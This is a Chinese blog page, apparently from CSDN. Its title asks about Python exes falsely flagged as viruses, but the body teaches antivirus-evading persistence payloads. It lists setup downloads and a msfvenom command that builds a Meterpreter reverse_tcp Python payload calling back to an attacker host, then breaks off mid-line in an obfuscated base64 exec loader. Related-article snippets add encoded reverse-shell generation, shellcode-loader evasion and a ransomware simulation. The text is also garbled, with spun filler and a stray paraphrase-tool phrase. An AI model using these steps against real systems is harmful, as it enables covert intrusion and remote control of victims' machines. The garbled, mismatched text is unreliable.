python打包的exe被当成病毒怎么办

最新推荐文章于 2025-04-27 13:58:26 发布
原创 最新推荐文章于 2025-04-27 13:58:26 发布 · 1.4k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python

很多渗透工具的权限维持能力会被防病毒软件检测到,打造免杀的payload很重要。本文介绍使用Python绕过防病毒软件的方法,包括环境准备,如安装Python 2.7.16 x86和Py2exe 32位,还提及用msfvenom生成Python Payload。
部署运行你感兴趣的模型镜像

大家好,小编来为大家解答以下问题,一个有趣的事情,一个有趣的事情,现在让我们一起来看看吧!

很多渗透工具都提供了权限维持的能力,如Metasploit、Empire和Cobalt Strike,但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候,似乎越来越多的人关注的是,这个方式会不会被被杀软杀掉?

打造免杀的payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件Deepl降重

0x01 环境准备

1、软件安装

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi

Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

evil-1.png

894761-20191212192507829-1465308333.png

evil.py 代码如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambd

您可能感兴趣的与本文相关的镜像

Stable-Diffusion-3.5

Stable-Diffusion-3.5

图片生成
Stable-Diffusion

Stable Diffusion 3.5 (SD 3.5) 是由 Stability AI 推出的新一代文本到图像生成模型,相比 3.0 版本,它提升了图像质量、运行速度和硬件效率

python打包exe如何免杀_Metasploit+python生成免杀exe过360杀
weixin_39771301的博客
11-26 877
Metasploit+python生成免杀exe过360杀1在kali下生成一个反弹的msf的python脚本,命令如下:msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /opt/bk.py2.拷贝出bk.py到windo...
Python免杀技术详解
weixin_68789096的博客
11-02 2202
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
Python免杀
土豆的博客
08-03 2696
Somethingu have to know: 本Python脚本构建简易的http请求及响应,可通过服务端调用客户端CMD执行命令(可在客户端内置便捷指令 )。 同时,脚本使用了PyInstaller,将python解释器及第三方模块进行打包成可执行文件。 经测试可免杀绝大多数杀软。 0x01 环境准备 pip install requests(用于发送请求) pip install pyscreenshot...
PyInstaller打包exe被防软件怎么办
02-03 7269
PyInstaller打包后被杀软件是一个常见的问题,但并不意味着你的程序有任何恶意行为。一个常见的原因是,杀软件通常会对未知的、经过打包的可执行文件进行扫描,并根据一些特定的特征或行为判断其是否是恶意软件。然而,近期有用户反映,在使用PyInstaller打包后,他们的程序被杀软件。杀软件的规则和算法不断更新,可能会导致不同的误情况。如果他们确认你的程序没有恶意行为,他们可能会将其添加到白名单中,从而避免误。这样,杀软件就能够验证程序的身份,并减少误的可能性。
node-webkit打包exe文件被360误木马的解决方法
09-03
当使用Node-Webkit打包应用时,有时会遇到一个问题,即生成的exe文件被安全软件,如360杀,误为木马。这个问题可能会对应用的分发和用户体验造成困扰。以下是一些解决此问题的方法: 1. **理解误原因**:安全...
Python】勒索病毒模拟
BrosyveryOK的博客
10-18 2980
​ 勒索病毒能将电脑上的一些重要文件进行数据加密,将文件以二进制的形式进行加密处理,导致无法成功打开加密后的文件,要打开必须要解密,要解密必须要解密程序,从而让我们能够进行勒索。​ 勒索病毒的原理不难,简单来说就是对数据的加密,而解密的办法一般只有我们自己知道,接下去就让我们来编写一些简单的勒索病毒吧!​ 勒索病毒更多情况下是.exe的可执行文件,一般情况下都是由编译型语言编写后编译形成。
第七课:你知道如何用python做个整蛊朋友的小病毒吗?看这里!七行代码搞定!
m0_53812508的博客
01-24 8129
各位热衷于刷抖音的同学一定在前几个月刷到过一条风靡全抖音的视频:哦泡果奶病毒。 基于好奇,我特地跨过山和大海,也穿越人山人海,最终搞到了这个程序的安装包。程序的功能其实也很简单,就是将代码打包成apk文件后,让人将其当成安装包安装在手机上,然后运行后,手机就会自动播放90后的童年回忆,哦泡果奶主题曲。并且这个程序在安装的时候会自动申请打开控制手机音量键,否则不通过这个权限程序根本无法运行。所以说如果你打开这个程序,手机的音量就不受你控制了,除非关机,不然你的手机配置再好,也逃脱不了被哦泡果奶主题曲冲击的命
手把手教python打包exe打包一个简易的小程序。tkinter,python初学者。编程初学者作业:用*填充出自己的名字
m0_52285505的博客
10-02 2873
如果你学会了python最基础的语法,想要制作一个可执行exe,那就看看我这篇文章吧
python创意turtle作品和代码,python的turtle库创意绘图
2401_85597209的博客
06-20 1526
前段时间,【草莓熊python turtle绘图代码】一文弄得我心情多少有点灰灰,此版草莓熊是我应某网友请求画的,当时只是想找个地方放代码给他,没想到访问量使用量会有那么多,抖音b站等等到处都是我画的草莓熊, 就连优快云都有几个盗我代码(他们删除了作者版权信息部分)当成自己原创,还都上了优快云首页热门推荐。如何用python画不同大小的满天星。。更有甚者,居然有人拿我草莓熊代码来卖钱!!!请记住,不要下载和购买这种代码(包括可执行的exe文件,小心代码被篡改有病毒)我的代码是完整源代码,
Python打包EXE文件被扫描当成病毒删除了,如何信任并恢复EXE文件
GodofNight的博客
09-20 4204
恢复被当做病毒删除的文件。
360卫士、杀python打包文件解决(使用pyinstaller打包
weixin_54857594的博客
05-24 2625
(没用,还是删360吧;如果需要可以交360审核标记)
17个新手常见的Python运行错误
ItStar
04-27 455
当初学 Python 时,想要弄懂 Python 的错误信息的含义可能有点复杂。这里列出了常见的的一些让你程序 crash 的运行时错误。1)忘记在 if , elif , el...
python必考题答案,python考点总结
P5688346的博客
03-15 408
大家好,小编为大家解答python必考题答案的问题。很多人还不知道python考点总结,现在让我们一起来看看吧!Source code download: 本文相关源码 type()不会认为子类是一种父类类型。 isinstance()会认为子类是一种父类类型 基础语法 运算符: 算术运算符: 多了一个**,代表 幂方 5**5 就是5的5次方 还多了一个 // 整数除法 逻辑运算符: and,or,not 与,或,非 赋值运算符: 没有++,– 身份运算符: is is not
【pyinstaller】打包py程序成exe被识别为病毒
最新发布
weixin_43815750的博客
04-27 708
使用pyinstaller(版本6.2.0)对python程序进行打包,得到的exe文件,被杀软件识别为病毒。尝试过的未生效方案:替换掉python程序中引入的os模块(网上说使用os模块可能会被识别为病毒
python网页点击下载按钮,python自动下载视频
Leospanb的博客
03-02 1191
爬虫就是自动获取网页内容的程序,例如搜索引擎,Google,Baidu 等,每天都运行着庞大的爬虫系统,从全世界的网站中爬虫数据,供用户检索时使用。爬虫流程其实把网络爬虫抽象开来看,它无外乎包含如下几个步骤模拟请求网页。模拟浏览器,打开目标网站。获取数据。打开网站之后,就可以自动化的获取我们所需要的网站数据。保存数据。拿到数据之后,需要持久化到本地文件或者数据库等存储设备中。那么我们该如何使用 Python 来编写自己的爬虫程序呢,在这里我要重点介绍一个 Python 库:Requests。
python将文件打包exe经常性的被360软件杀掉问题
小猪观察员的博客
01-09 2792
应该pathlib是python有自带的库,在虚拟环境下也进行了安装,此时打包的时候发生了冲突。所以根据提示,将虚拟环境下的pathlib包进行pip uninstall 操作后。运行程序,程序可以正常运行,同时进行打包后,打包ok。在python将程序打包后,发生360会一直将自己打包出来的文件进行清楚,查询资料发生可能是因为调用了os库。使用pyinstaller打包遇到的问题,程序还是会被360进行查杀,沙币360。进行检查,360是否还会将程序杀掉。
解决Python打包exe缺少dll文件的方法
他写了一个Python小程序,然后将其打包exe文件。在自己的电脑上运行时,系统提示缺少dll文件。他首先尝试了下载2015vc库合集,但并未解决问题。后来,他在网上找到了一种方法,即如果电脑缺少dll文件,可以下载...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值